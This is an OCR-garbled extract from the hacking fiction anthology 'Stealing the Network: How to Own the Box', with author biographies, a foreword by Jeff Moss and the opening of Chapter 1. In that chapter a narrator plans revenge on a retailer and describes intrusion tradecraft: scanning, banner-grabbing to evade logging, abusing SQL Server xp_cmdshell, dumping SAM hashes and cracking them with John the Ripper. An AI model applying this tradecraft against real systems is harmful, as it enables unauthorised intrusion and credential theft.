these, including the beset-selling Snort 2.1 Intrusion Detection make up his Open Source Security series The other two are from the Stealing the Network series.
Jay makes his living as a security consultant with the fi rm Intelguardians, which he co-founded with industry leaders Ed Skoudis, Eric Cole, Mike Poor, Bob Hillery, and Jim Alderson, where his work in penetration testing allows him to focus on attack as well as defense
Prior to consulting, Jay served as the Security Team Director for MandrakeSoft, helping set company strategy, design security products, and pushing security into the third largest retail Linux distribution
Jay Beale would like to recognize the direct help of Cynthia Smidt in polishing this chapter She’s the hidden force that makes projects like these possible
Mark Burnett: How to Own the Box: Contributing Author.
Mark is a security consultant, author, and researcher who specializes in hardening Microsoft Windows-based servers and networks He has spent the last ten years developing unique strategies and techniques for locking down servers and maintaining his specialized expertise
of Windows security Mark is author and coauthor of a number of security books including
Perfect Passwords, Stealing the Network, and Hacking the Code Mark writes articles for numerous
magazines and web publications including Windows IT Pro, Security Pro VIP, SecurityFocus com, and Windows Secrets Microsoft has six times recognized Mark’s contribution to the
Windows community with the Most Valued Professional (MVP) award in IIS and Windows Enterprise Security MVP
Paul Craig: How to Own the Box: Contributing Author How to Own a Continent:
Contributing Author of Chapter 18, Primary Character: Dex.
Paul Craig is a principal security consultant at Security-Assessment.com in Auckland, New Zealand Paul specializes in application penetration testing and provides security consultancy services throughout the Asia-Pacifi c region
Paul is an active researcher in the fi eld of information security and exploit development
In the past Paul has released security advisories relating to newly discovered fl aws in mercial product vendors such as Microsoft, Adobe, HP and 3Com Paul is a published author and regularly speaks at security conferences around the globe in the fi eld of information security
Trang 22com-Author Biographies xxi
Ido Dubrawsky (CCNA, CCDA, SCSA): How to Own the Box: Contributing Author.
Ido Dubrawsky is Microsoft’s Security Advisor for the Communications Sector Americas
dis-trict Prior to joining Microsoft he was the acting National Practice Lead for Security Consulting
with AT&T’s Callisma subsidiary Ido has nearly 20 years of IT experience with the past 10 years
focusing predominantly on information security Prior to his experience in AT&T/Callisma, Ido
was a network security architect for Cisco Systems working on the SAFE Architecture in the
Security Technologies Group where he authored a variety of white papers focusing on network
security, intrusion detection and layer 2 security Ido was also the technical editor for Syngress
Press’ book, Building Enterprise DMZs 2nd Edition and co-authored or contributed to several
other books by Syngress Press including Hack Proofi ng Your Network, Hack Proofi ng Sun Solaris 8,
Cisco PIX Firewalls, Cisco Security Professional’s Guide: Secure Intrusion Detection, and Stealing the
Network: How to Own the Box Ido has written on numerous security topics in SysAdmin
mag-azine as well as on SecurityFocus and has presented at various conferences around the world
including Cisco’s Networkers, SANS, CSI, and RSA Ido holds a Bachelor’s and Master’s degree
from the University of Texas at Austin in Aerospace Engineering, holds the CISSP certifi cation
and is a longtime member of USENIX and SAGE as well as a member of ISSA and ISACA
Riley “Caezar” Eller: How to Own an Identity: Contributing Author of Chapter 21, Primary
Character: The woman with no name.
Riley “Caezar” Eller has extensive experience in internet embedded devices and protocol
security He invented automatic web vulnerability analysis and ASCII-armored stack overfl ow
exploits, and contributed to several other inventions including a pattern language for
describ-ing network attacks His credits include the Black Hat Security Briefi ngs and Traindescrib-ing series,
“Meet the Enemy” seminars, the books Hack Proofi ng Your Network: Internet Tradecraft, and the
“Caezar’s Challenge” think tank As creator of the Root Fu scoring system and as a founding
member of the only team to ever win three consecutive DEFCON Capture the Flag contests,
Caezar is the authority on security contest scoring
FX: How to Own the Box: Contributing Author How to Own a Continent: Contributing
Author of Chapter 17, Primary Character: h3X.
FX of Phenoelit has spent the better part of his life becoming familiar with the security issues
faced by the foundation of the Internet, including protocol-based attacks and exploitation
of Cisco routers He has presented the results of his work at several conferences including
DEFCON, Black Hat Briefi ngs, and the Chaos Communications Congress In his professional
life, FX runs Recurity Labs, a Berlin-based security consulting and research company His
spe-cialty lies in security evaluation and testing of custom applications and black box devices
FX loves to hack and hang out with his friends in Phenoelit and wouldn’t be able to do the
things he does without the continuing support and understanding of his mother, his friends,
and especially his partner, Bine, with her infi nite patience and love
Gordon Lyon (aka Fyodor): How to Own a Continent: Contributing Author of Chapter 16,
Primary Character: Sendai.
Gordon Lyon (also known as Fyodor) released the open source Nmap Security Scanner in
1997 and continues to coordinate its development He also maintains the Insecure.Org,
Trang 23Nmap.Org, SecLists.Org, and SecTools.Org security resource sites and has written seminal papers on OS detection and stealth port scanning He is a founding member of the Honeynet Project, a popular speaker at security conferences, and author or co-author of the books
Nmap Network Scanning, Know Your Enemy: Honeynets and Stealing the Network: How to Own a Continent Gordon is President of Computer Professionals for Social Responsibility (CPSR),
which has promoted free speech, security, and privacy since 1981
Joe Grand (aka Kingpin): How to Own the Box: Contributing Author How to Own a Continent: Contributing Author of Chapter 15, Primary Character: The Don.
Joe Grand (aka Kingpin) is an electrical engineer, hardware hacker, and president of Grand Idea Studio, Inc (www.grandideastudio.com), where he specializes in the invention, design, and licensing of consumer products, video game accessories, and modules for electronics hobbyists
He has also spent many years fi nding security fl aws in hardware devices and educating engineers on how to increase security of their designs
Involved in computers and electronics since the age of 7, Joe is a former member of the legendary hacker collective L0pht Heavy Industries and has testifi ed before the United States Senate Governmental Affairs Committee regarding government and homeland computer
security He is the author of Hardware Hacking: Have Fun While Voiding Your Warranty and
Game Console Hacking and is a frequent contributor to other texts.
Joe is also the sole proprietor of Kingpin Empire (www.kingpinempire.com), a inspired apparel project that gives back to the technology and health communities through
hacker-charitable donations, and a co-host of Prototype This on Discovery Channel.
Brian Hatch: How to Own an Identity: Contributing Author of Chapter 25, Primary
Character: Glenn.
Brian is Chief Hacker at Onsight, Inc., where he is a Unix/Linux and network security tant His clients have ranged from major banks that survived the subprime debacle, pharmaceu-tical companies that keep our children medicated, and—thus far—two major California browser developers He has taught various security, Unix, and programming classes for corporations through Onsight and as an adjunct instructor at Northwestern University He has been securing and breaking into systems since before he traded his Apple II⫹ for his fi rst Unix system
consul-Brian is the lead author of Hacking Linux Exposed, and co-author of Building Linux VPNs, as well as articles for various online sites such as SecurityFocus, and is the author of the not-so- weekly Linux Security: Tips, Tricks, and Hackery newsletter He is also a maintainer of Stunnel,
the Universal SSL Wrapper, and added the SSL support for Nmap Every network-addressable device he owns, down to his cell phone, has both an SSH client and server installed Sadly, he has yet to get his PGP public key printed in QR Code on his business cards
Brian is thrilled that his eight-year-old daughter has decided to switch to the Dvorak keyboard layout Though there’s no TV in the house, she and her fi ve-year-old twin siblings are able to have their mind rot by watching YouTube on the Intarweb
In Brian’s free time he… wait, he doesn’t have any
Trang 24Author Biographies xxiii
Chris Hurley (aka Roamer): How to Own an Identity: Contributing Author of Chapter 23,
Primary Character: Saul.
Chris Hurley (Roamer) is a Penetration Tester working in the Washington, DC area He is the
founder of the WorldWide WarDrive, a four-year effort by INFOSEC professionals and
hob-byists to generate awareness of the insecurities associated with wireless networks, and was the
lead organizer of the DEFCON WarDriving Contest for its fi rst 4 years
Although he primarily focuses on penetration testing these days, Chris also has extensive
experience performing vulnerability assessments, forensics, and incident response Chris
has spoken at several security conferences and published numerous whitepapers on a wide
range of INFOSEC topics Chris is the lead author of WarDriving: Drive, Detect, Defend, and
WarDriving for Penetration Testers and a contributor to Aggressive Network Self-Defense, OS X
For Hackers at Heart, and Infosec Career Hacking Chris holds a Bachelor’s degree in computer
science He lives in Maryland with his wife Jennifer and their daughter Ashley
Dan Kaminsky (aka Effugas): How to Own the Box: Contributing Author.
Dan Kaminsky is a Senior Security Consultant for Avaya’s Enterprise Security Practice, where
he works on large-scale security infrastructure Dan’s experience includes two years at Cisco
Systems, designing security infrastructure for cross-organization network monitoring
sys-tems, and he is best known for his work on the ultra-fast port scanner, scanrand, part of the
“Paketto Keiretsu,” a collection of tools that use new and unusual strategies for manipulating
TCP/IP networks He authored the Spoofi ng and Tunneling chapters for Hack Proofi ng Your
Network, Second Edition and has delivered presentations at several major industry conferences,
including LinuxWorld, DEFCON, and past Black Hat Briefi ngs Dan was responsible for the
Dynamic Forwarding patch to OpenSSH, integrating the majority of the VPN-style
functional-ity into the widely deployed cryptographic toolkit Finally, he founded the cross-disciplinary
DoxPara Research in 1997, seeking to integrate psychological and technological theory to
create more effective systems for non-ideal but very real environments in the fi eld Dan is
based in Silicon Valley, CA
Tom Parker: How to Own a Continent: Contributing Author of Chapter Interludes How to
Own an Identity: Contributing Author of Chapter 29, Primary Character: Carlton.
Tom Parker is a computer security analyst who, alongside his work providing integral
secu-rity services for some of the world’s largest organizations, is widely known for his
vulnerabil-ity research on a wide range of platforms and commercial products His most recent work
includes the development of an embedded operating system, media management system and
cryptographic code for use on digital video band (DVB) routers, deployed on the networks of
hundreds of large organizations around the globe In 1999, Tom helped form Global InterSec
LLC, playing a leading role in developing key relationships between GIS and the public and
private sector security companies
Whilst continuing his vulnerability research, focusing on emerging threats, technologies and
new vulnerability exploitation techniques, Tom spends much of his time researching
method-ologies aimed at characterizing adversarial capabilities and motivations against live, mission
critical assets He provides methodologies to aid in adversarial attribution in the unfortunate
times when incidents do occur
Trang 25Currently working for NetSec, a leading provider of managed and professional security services, Tom continues his research into fi nding practical ways for large organizations to manage the ever-growing cost of security, through identifying where the real threats lay, and
by defi ning what really matters
Tom regularly presents at closed-door and public security conferences, including Black Hat Briefi ngs, and is often referenced by the world’s media on matters relating to computer secu-rity In the past, Tom has appeared on BBC News and is frequently quoted by the likes of Reuters News and ZDNet
Ken Pfeil: How to Own the Box: Contributing Author.
Ken Pfeil is currently Executive Director and Head of Information Security, Americas Region for German Landesbank WestLB AG Ken’s Information Technology and Security experience spans well over two decades, with strategic technical and executive experience at companies such as Microsoft, Capital IQ, Miradiant Global Network, Dell, Identix, Barnes and Noble.com, and Merrill Lynch While at Microsoft Ken coauthored Microsoft’s “Best Practices for Enterprise Security” white paper series, was a technical contributor for the MCSE Exam “Designing Security for Windows 2000” and offi cial course curriculum for the same In 1998, Ken founded “The
NT Toolbox” web site, where he oversaw all operations and led the company to acquisition by GFI Software in 2002 Ken is a Subject Matter Expert for CompTIA’s Security⫹ certifi cation, a member of IETF, IEEE and New York Electronic Crimes Task Force groups, and participated on the Information Systems Security Association’s International Privacy Advisory Board covering GLBA He reported on security risks and performed vulnerability analysis for Windows IT Pro Magazine’s “Security Administrator” publication for four years, and is a contributing expert for both Information Security and CSO Magazines Ken has been a guest instructor at the Federal Law Enforcement Training Center and is a sought after speaker at industry conferences on information security matters Ken was a 2005 and 2006 nominee for The Executive Alliance’s
“Information Security Executive of the Year,” for both Tri-State and National awards
Russ Rogers (CISSP, CISM, IAM): How to Own a Continent: Contributing Author of Chapter
13, Primary Character: Saul.
Russ Rogers is a penetration tester for a Federal Government contractor and former Co-Founder, Chief Executive Offi cer, Chief Technology Offi cer, and Principle Security Consultant for Security Horizon, Inc
Russ is a United States Air Force veteran and has served in military and contract support for the National Security Agency and the Defense Information Systems Agency Russ is also
the editor-in-chief of The Security Journal and occasional staff member for the Black Hat
Briefi ngs Russ holds an Associate’s degree in Applied Communications Technology from the Community College of the Air Force, a Bachelor’s degree from the University of Maryland
in computer information systems, and a Master’s degree from the University of Maryland
in computer systems management Russ is a member of the Information System Security Association (ISSA), the Information System Audit and Control Association (ISACA), and the Association of Certifi ed Fraud Examiners (ACFE) He is also an Associate Professor at the University of Advancing Technology (uat.edu) in Tempe, AZ Russ has authored, co-authored,
and edited a number of computer security related books including WarDriving, Drive, Detect,
Trang 26Author Biographies xxv
Defend: A Guide to Wireless Security, and SSCP Study Guide and DVD Training System Russ has
recently founded a new company, Peak Security, Inc., at peaksec.com
Special Contributors
Anthony Kokocinski: How to Own an Identity: Special Contributing Author of Chapters 27
and 30.
Anthony Kokocinski stated his career working for law enforcement in the great state of Illinois
Just out of college, he began working with some of Illinois’s fi nest against some of Illinois’s
worst After enjoying a road-weary career, he got away from “The Man” by selling out to work
for the Computer Sciences Corporation There he was placed into a DoD contract to develop
and teach computer/network forensics Although well-versed in the tome of Windows™, his
plat-form of choice has always been Macintosh He has been called a “Mac Zealot” by only the most
ignorant of PC users and enjoys defending that title with snarky sarcasm and the occasional
conversion of persons to the Mac “experience.”
I would like to thank all of the wonderful and colorful people I had the privilege and honor of
work-ing with in Illinois and parts of Missouri This includes all of the civilian and investigative members of
ICCI, and all of the extended supporters in the RCCEEG units Many of you will fi nd either your
like-nesses or those around you blatantly stolen for character templates in these vignettes I would also like
to thank all of the GDGs, past and present, from DCITP Thanks should also be given to the few who
have ever acted as a muse or a brace to my work And of course to johnny, who insisted on a character
with my name, but would not let me write one with his Lastly, love to my family always, and wondrous
amazement to my Grandmother who is my unwavering model of faith.
Foreword Contributors
Jeff Moss (aka The Dark Tangent): How to Own a Continent: Foreword Contributor How to
Own an Identity: Contributing Author of Chapter 21, Primary Character: Tom.
CEO of Black Hat, Inc and founder of DEFCON, Jeff Moss is a renowned computer security
scientist best known for his forums, which bring together the best minds from government
agencies and global corporations with the underground’s best hackers Jeff’s forums have
gained him exposure and respect from each side of the information security battle, enabling
him to continuously be aware of new security defense, as well as penetration techniques and
trends Jeff brings this information to three continents—North America, Europe, and Asia—
through his Black Hat Briefi ngs, DEFCON, and “Meet the Enemy” sessions
Jeff speaks to the media regularly about computer security, privacy, and technology and has
appeared in such media as Business Week, CNN, Forbes, Fortune, New York Times, NPR, National
Law Journal, and Wired Magazine Jeff is a regular presenter at conferences including Comdex,
CSI, Forbes CIO Technology Symposium, Fortune Magazine’s CTO Conference, The National
Information System Security Convention, and PC Expo
Prior to Black Hat, Jeff was a director at Secure Computing Corporation, and helped
create and develop their Professional Services Department in the United States, Taipei, Tokyo,
Singapore, Sydney, and Hong Kong Prior to Secure Computing Corporation, Jeff worked for
Ernst & Young, LLP in their Information System Security division
Trang 27Jeff graduated with a BA in criminal justice Jeff got halfway through law school before ing to his fi rst love: computers Jeff started his fi rst IT consulting business in 1995 He is CISSP certifi ed and a member of the American Society of Law Enforcement Trainers.
return-Anthony Reyes: How to Own an Identity: Foreword Contributor.
Anthony Reyes is a former Detective with the New York City Police Department’s Computer Crimes Squad (CCS) During his assignment with the CCS, he investigated computer intrusions, fraud, identity theft, intellectual property theft, and child exploitation He served as the 2007 International President for the High Technology Crime Investigation Association and presently chairs the Education and Training Group for the National Institute of Justice’s Electronic Crime Partner Initiative Mr Reyes previously sat as an alternate member of New York Governor George
E Pataki’s Cyber-Security Task Force Anthony is a published author, professor, and much sought after lecturer and practitioner around the world As the Chief Executive Offi cer of the Arc Group
of New York, a Wall Street based company, he provides consultant, investigation, and training services globally to large corporations and government agencies Until January 1, 2008 he served
as a consultant to China’s Ministry of Public Security for the 2008 Olympics Games
Story Editors
D Scott Pinzon (CISSP, NSA-IAM): How to Own a Shadow: Story Editor.
Scott Pinzon has worked in network security for seven years, and for seventeen years has written about high technology for clients both large (Weyerhaeuser’s IT department) and small (Seattle’s
fi rst cash machine network) As Editor-in-Chief of WatchGuard Technologies’ LiveSecurity Service, he has edited and published well over 1,300 security alerts and “best practices” network security articles for a large audience of IT professionals He is the director and co-writer of the popular “Malware Analysis” video series, viewable on YouTube and Google Video by searching
on “LiveSecurity.” Previously, as the founder and creative director of Pilcrow Book Services, Scott supervised the production of more than 50 books, helping publishers take manuscripts to book-store-ready perfection He studied Advanced Commercial Fiction at the University of Washington Scott has authored four published young adult books and sold 60 short stories
The majority of these clients are in the fi nancial services industry, government, gaming and manufacturing where information security is an essential part of their core competency SensePost analysts are regular speakers at international conferences including Black Hat Briefi ngs, RSA, etc., and the SensePost “Innovation Center” produces a number of leading open-source and commercial security tools like BiDiBLAH, Wikto, Suru, etc
Trang 28Author Biographies xxvii
For more information, visit http://www.sensepost.com
Technical Reviewers
Kevin Mitnick: How to Own a Continent: Technical Reviewer.
Kevin Mitnick is a security consultant to corporations worldwide and a cofounder of Defensive
Thinking, a Los Angeles-based consulting fi rm (www.defensivethinking.com) He has testifi ed
before the Senate Committee on Governmental Affairs on the need for legislation to ensure
the security of the government’s information systems His articles have appeared in major news
magazines and trade journals, and he has appeared on Court TV, Good Morning America, 60
Minutes, CNN’s Burden of Proof and Headline News, and has been a keynote speaker at numerous
industry events He has also hosted a weekly radio show on KFI AM 640, Los Angeles Kevin is
author of the best-selling book, The Art of Deception: Controlling the Human Element of Security.
Technical Inspiration
Roelof Temmingh: How to Own a Shadow: Technical Inspiration.
Roelof Temmingh was the fourth child born in a normal family of two acclaimed academic
musicians in South Africa This is where all normality for him stopped Driven by his
insa-tiable info lust he furthered his education by obtaining a B Degree in Electronic Engineering
Roelof’s obsession with creativity led him to start a company along with a similarly minded
friend Together they operated from a master bedroom at Roelof’s house and started SensePost
During his time at SensePost, Roelof became a veteran Black Hat trainer/speaker and spoke at
RSA and Ruxcon—to name a few He also contributed to many Syngress books such as How to
Own a Continent and Aggressive Network Self-Defense SensePost is continuing business as usual
although Roelof left at the end of 2006 in order to pursue R&D in his own capacity
Roelof thrives on “WOW”; he embodies the weird and he craves action He loves to initiate and
execute great ideas and lives for seeing the end product “on the shelves.” Roelof likes to be true to
himself and celebrate the “weird ones.” His creativity can be found in the names and functions
of the tools that he created—from Wikto and the infamous BiDiBLAH (which someone fondly
described as “having a seizure on the keyboard”) to innovative tools like Crowbar and Suru
NGS Software: How to Own a Shadow: Technical Inspiration.
NGS Software is the leader in database vulnerability assessment Founded by David and Mark
Litchfi eld in 2001, the team at NGS has pioneered advanced testing techniques, which are
both accurate and sage and which are employed by NGSSQuirreL, the award-winning VA and
security compliance tool for Oracle, SQL Server, DB2, Informix and Sybase Used as the tool
of choice by government, fi nancial, utilities and consulting organizations across the world,
NGSSQuirreL is unbeatable
Copyeditor
Jon Lasser: How to Own an Identity: Copyeditor.
Jon Lasser lives in Seattle, Washington, where he works in the computer industry and writes
fi ction
Trang 31Chapter 1: Hide and Sneak Ido Dubrawsky 7 Chapter 2: The Worm Turns Ryan Russell and Timothy Mullen 23 Chapter 3: Just Another Day at the Offi ce Joe Grand 41 Chapter 4: h3X’s Adventures in Networkland FX 63 Chapter 5: The Thief No One Saw Paul Craig 103 Chapter 6: Flying the Friendly Skies Joe Grand 119 Chapter 7: dis-card Mark Burnett 129 Chapter 8: Social (In)Security Ken Pfeil 143 Chapter 9: BabelNet Dan Kaminsky 157 Chapter 10: The Art of Tracking Mark Burnett 175 Appendix: The Laws of Security Ryan Russell 199
Trang 32Stealing the Network: How to Own the Box is a unique book in the fi ction department It
com-bines stories that are fi ctional with technology that is real While none of these specifi c events have happened, there is no reason why they could not You could argue it provides a roadmap for criminal hackers, but I say it does something else: It provides a glimpse into the creative minds of some of today’s best hackers, and even the best hackers will tell you that the game
is a mental one The phrase “Root is a state of mind,” coined by K0resh and printed on shirts from DEF CON, sums this up nicely While you may have the skills, if you lack the mental fortitude, you will never reach the top This is what separates the truly elite hackers from the wannabe hackers
When I say hackers, I don’t mean criminals There has been a lot of confusion surrounding this terminology, ever since the mass media started reporting computer break-ins Originally,
it was a compliment applied to technically adept computer programmers and system
admin-istrators If you had a problem with your system and you needed it fi xed quickly, you got your best hacker on the job They might “hack up” the source code to fi x things, because they knew the big picture While other people may know how different parts of the system work, hack-
ers have the big picture in mind while working on the smallest details This perspective gives them great fl exibility when approaching a problem, because they don’t expect the fi rst thing that they try to work
The book Hackers: Heroes of the Computer Revolution, by Steven Levy (1984), really captured
the early ethic of hackers and laid the foundation for what was to come Since then, the term
hacker has been co-opted through media hype and marketing campaigns to mean
some-thing evil It was a convenient term already in use, so instead of simply saying someone was
a criminal hacker, the media just called him a hacker You would not describe a criminal auto
mechanic as simply a mechanic, and you shouldn’t do the same with a hacker, either
When the fi rst Web site defacement took place in 1995 for the movie Hackers, the race was
on Web defacement teams sprung up over night Groups battled to outdo each other in both
quantity and quality of the sites broken into No one was safe, including The New York Times
and the White House Since then, the large majority of criminal hacking online is performed by
“script-kiddies”—those who have the tools but not the knowledge This vast legion creates the background noise that security professionals must deal with when defending their networks How can you tell if the attack against you is a simple script or just the beginning of a sophisti-
cated campaign to break in? Many times you can’t My logs are full of attempted break-ins, but
I couldn’t tell you which ones were a serious attempt and which ones were some automated bulk vulnerability scan I simply don’t have the time or the resources to determine which threats are real, and neither does the rest of the world Many attackers count on this fact
How do the attackers do this? Generally, there are three types of attacks Purely technical attacks rely on software, protocol, or confi guration weaknesses exhibited by your systems,
Foreword
Trang 33which are exploited to gain access These attacks can come from any place on the planet, and they are usually chained through many systems to obscure their ultimate source The vast majority of attacks in the world today are of this type, because they can be automated easily They are also the easiest to defend against.
Physical attacks rely on weaknesses surrounding your system These may take the form of dumpster diving for discarded password and confi guration information or secretly applying a keystroke-logging device on your computer system In the past, people have physically tapped into fax phone lines to record documents, tapped into phone systems to listen to voice calls, and picked their way through locks into phone company central offi ces These attacks bypass your information security precautions and go straight to the target They work because people think of physical security as separate from information security To perform a physical attack, you need to be where the information is, something that greatly reduces my risk, since not many hackers in India are likely to hop a jet to come attack my network in Seattle These attacks are harder to defend against but less likely to occur
Social engineering (SE) attacks rely on trust By convincing someone to trust you, on the phone or in person, you can learn all kinds of secrets By calling a company’s help desk and pretending to be a new employee, you might learn about the phone numbers to the dial-up modem bank, how you should confi gure your software, and if you think the technical people defending the system have the skills to keep you out These attacks are generally performed over the phone after substantial research has been done on the target They are hard to defend against in a large company because everyone generally wants to help each other out, and the right hand usually doesn’t know what the left is up to Because these attacks are voice-oriented, they can be performed from anyplace in the world where a phone line is available Just like the technical attack, skilled SE attackers will chain their voice call through many hops
to hide their location
When criminals combine these attacks, they can truly be scary Only the most paranoid can defend against them, and the cost of being paranoid is often prohibitive to even the largest company For example, in 1989, when Kevin Poulson wanted to know if Pac Bell was onto his phone phreaking, he decided to fi nd out What better way than to dress up as a phone company employee and go look? With his extensive knowledge of phone company lingo, he was able to talk the talk, and with the right clothes, he was able to walk the walk His feet took him right into the Security department’s offi ces in San Francisco, and after reading about himself in the company’s fi le cabinets, he knew that they were after him
While working for Ernst & Young, I was hired to break into the corporate headquarters of a regional bank By hiding in the bank building until the cleaners arrived, I was able to walk into the Loan department with two other people dressed in suits We pretended we knew what we were doing When questioned by the last employee in that department, we said that
we were with the auditors That was enough to make that employee leave us in silence; after
all, banks are always being audited by someone From there, it was up to the executive level
With a combination of keyboard loggers on the secretary’s computer and lock picking our way into the president’s offi ces, we were able to establish a foothold in the bank’s systems Once we started attacking that network from the inside, it was pretty much game over
Rarely is hacking in the real world this cool Let’s understand that right now To perform these attacks, you must have extreme “intestinal fortitude,” and let’s face it, only the most motivated
Trang 34Foreword 5
attacker would risk it In my case, the guards really did have guns, but unlike Kevin, I had a
“get out of jail free card,” signed by the bank president
In the real world, hackers go after the “low-hanging fruit.” They take the least risk and go for the greatest reward They often act alone or in small groups They don’t have government funding or belong to world criminal organizations What they do have is spare time and a lot of curiosity, and believe me, hacking takes a lot of time Some of the best hackers spend months working on one exploit At the end of all that work, the exploit may turn out to not
be reliable or to not function at all! Breaking into a site is the same way Hackers may spend weeks performing reconnaissance on a site, only to fi nd out there is no practical way in, so it’s back to the drawing board
In movies, Hollywood tends to gloss over this fact about the time involved in hacking Who wants to watch while a hacker does research and test bugs for weeks? It’s not a visual activity like watching bank robbers in action, and it’s not something the public has experience with
and can relate to In the movie Hackers, the director tried to get around this by using a visual montage and some time-lapse effects In Swordfi sh, hacking is portrayed by drinking wine to become inspired to visually build a virus in one night One of the oldest hacking movies, War
Games, is the closest to reality on the big screen In that movie, the main character spends
considerable time doing research on his target, tries a variety of approaches to breaking in, and in the end, is noticed and pursued
But what if …? What would happen if the attackers were highly motivated and highly skilled? What if they had the guts and skills to perform sophisticated attacks? After a few drinks, the authors of the book you are holding in your hands were quick to speculate on what would be possible Now, they have taken the time and effort to create 10 stories exploring just what it would take to own the network
When the movie War Games came out in 1983, it galvanized my generation and got me into
hacking Much like that fi ctitious movie introduced hacking to the public, I hope this book inspires and motivates a new generation of people to challenge common perceptions and keep asking themselves, “What if?”
—Jeff Moss
Black Hat, Inc
www.blackhat.comSeattle, 2003
Trang 36The people who ran this site had ticked me off I bought some computer hardware from them, and they took forever to ship it to me On top of that, when the stuff fi nally arrived, it was damaged I called their support line and asked for a return or an exchange, but they said that they wouldn’t take the card back because it was a closeout Their site didn’t say that the card was a closeout! I told the support drones that, but they wouldn’t listen They said, “policy is policy,” and “didn’t you read the fi ne print?” Well, if they’re going to take that position … Look, they were okay guys on the whole They just needed a bit of a lesson That’s all.
So, there I was, the day after Christmas, with nothing to do The family gathering was over
I decided to see just how good their site was Just a little peek at what’s under the hood There’s nothing wrong with that I’ve hacked a few Web sites here and there—no defacements, but just looking around Most of what I hit in the past were some universities and county gov-
ernment sites I had done some more interesting sites recently, but these guys would be very interesting In fact, they proved to be a nice challenge for a boring afternoon
Now, one of my rules is to never storm the castle through the drawbridge Their Web farm for their e-commerce stuff (and probably their databases) was colocated at some data center
I could tell because when I did traceroutes to their Web farm, I got a totally different route than when I did some traceroutes to other hosts I had discovered off their main Web site So,
Trang 37it looked like they kept their e-commerce stuff separated from their corporate network, which sounds reasonable to me That made it easy for me to decide how I would approach their net-work I would look at the corporate network, rather than their data center, since I fi gured they probably had tighter security on their data center.
TOOLS
First off, my platform of choice should be pretty obvious It’s Linux Almost every tool that
I have and use runs under Linux On top of that, my collection of exploits runs really well under Linux Now, OpenBSD is okay, and I’m something of a Solaris fan as well, but when
I work, I work off a Linux platform I don’t care whether it’s Red Hat, Mandrake, or Debian That’s not important What’s important is that you can tune the operating system to your needs That’s the key You need to be able to be sure that the underlying operating system is reliable On a related note, my homegrown tools are a mixture of Bourne shell, Expect, and Python scripts There’s a small amount of Perl in there as well, but most of the scripts are writ-ten in Python Code reuse is important if you want to be successful at this game
For network scanning, I prefer nmap It’s a great tool I used to use strobe, but nmap provides
so many more capabilities—everything from regular connection scans to FIN scans, UDP scans, slow scanning, fast scanning, controlling ports, and so on It’s my scanner of choice for identifying targets on a network I occasionally rely on it for identifying the target operating system; however, I’ve found that, in some cases, this crashes the target machine, and that’s something of a big giveaway
For identifying the target operating system, I tend to rely on banner-grabbing While nmapdoes provide for remote operating system (OS) fi ngerprinting, it can sometimes make mis-takes I’ve seen nmap identify a Solaris 7 host as an OpenBSD system Banner-grabbing still remains sort of the “gold-standard” for remote OS fi ngerprinting Most system administrators just don’t get it They could make my job much more diffi cult if they would just take the time
to reduce the identifi cation profi le of their systems It doesn’t take much—just a little effort Banner-grabbing can be a bit risky, since it usually involves a full connection in order to get this information; however, bringing your intended target down by using nmap’s OS fi nger-printing capabilities is not necessarily a good idea either
So what are good port choices for OS identifi cation? Well, two of the more useful TCP ports for banner-grabbing include port 80 (WWW) and port 25 (SMTP) Port 21 (FTP) and port
23 (telnet) are not really good choices If the other side is smart, they’ve got ports 21 and
23 locked down through router access control lists (ACLs), fi rewalled, or access-controlled through TCP wrappers Any way you look at it, it’s a pretty safe bet that those two ports are logged somewhere While, yes, you probably will get logged with WWW and SMTP as well The difference is that the information usually is buried deep down in some log fi le that admins won’t really look at, because they get thousands of connections all day, every day.Now, for applications I rely on a variety of tools Almost all of them are chosen for simplicity and for the ability to modify them for my own needs For Web servers I prefer RFP’s Whisker program Yeah, I’ve tried Nikto and like it a lot (I even use it as a backup for Whisker), but I’ve gotten to really trust Whisker You need to trust your tools if you’re going to be successful with them “But what about SSL servers?” you ask Well, for those, there’s sslproxy While
Trang 38Hide and Sneak CHAPTER 1 9
it in itself is not a tool to hack with, you can use it to provide the encryption to run Whisker against an SSL server Nice, huh?
For Microsoft SQL Servers, there’s LinSQL This is a wonderful tool, essentially a Microsoft SQL client for Linux that I’ve modifi ed to fi t my needs It never ceases to amaze me that net-
work administrators put Microsoft SQL Servers in positions where they are accessible from the Internet Another item that astounds me is how many times I’ve come across a Microsoft SQL Server where the sa account password is blank Sometimes, that is enough to provide direct access to the network LinSQL relies on the xp_cmdshell extended stored procedure
to execute any commands you send to the operating system Some administrators are smart enough to remove that procedure from the SQL Server For those cases, I use SQLAT, for SQL Auditing Tools
SQLAT is another Linux/BSD-based tool kit that can be used against Microsoft SQL Servers SQLAT is essentially a suite of tools that can do dictionary attacks, upload fi les, read the system Registry, as well as dump the SAM There is also a tool for doing a minimal analysis of a SQL Server with the output viewable as HTML The tool suite requires access to the sa account in order to run some of the tools, but this usually is not a problem If the SQL administrator has removed the xp_cmdshell extended procedure, the tool temporarily restores xp_cmdshell
In order to do this, the dynamic link library (DLL) containing the xp_cmdshell code must still be on the system SQLAT provides a wealth of information about the SQL Server and makes cracking it much easier Once I’ve gathered the necessary information about the SQL Server, I can obtain access to the system very soon thereafter
My toolkit is wide and varied, and it contains a whole slew of exploits I have acquired over the years I keep everything in what I call an “attack tree” directory structure Essentially,
I have exploits broken down between UNIX exploits and Windows-based exploits From there, I break down these two categories into the subcategories of remote and local Then I subdivide the remote and local categories into exploits for various services The next level is the breakdown of the exploits based on the operating system they affect The structure of the attack tree is mirrored in the attack tree directory structure If I needed an exploit against say, Solaris 8’s snmpXdmid service, I would go to the directory named /exploits/unix/remote/
snmp/solaris/8 to look for the exploit code or a binary that has already been compiled and
is ready to run The tree structure looks something like this:
HTTP
SMTP
Telnet SNMP
remote local
HTTP
SMTP
Telnet SNMP
HTTP
SMTP
Telnet SNMP
Exploit Attack Tree Structure
Trang 39This is by no means exhaustive I also keep exploits or information about exploits for network devices like Cisco routers and switches I have a directory dedicated to default passwords for various systems and accounts All in all, I have a pretty big toolbox for cracking into networks.Once I get into a system, I usually try to dump out either the SAM or capture the UNIX pass-word and shadow fi les If I can get those, then I download them to my local system and run them through John the Ripper It’s the best open-source password cracker around in my opin-ion I’ve used it for a long time, and I’ve traded john.pot fi les with friends My john.pot col-lection is now over 10MB, and my password list that John uses is almost 60MB On a Windows box, if I can get access and obtain the SAM, I’m pretty much guaranteed that I’ll have a password that I can use to further exploit that access.
THE SCAN
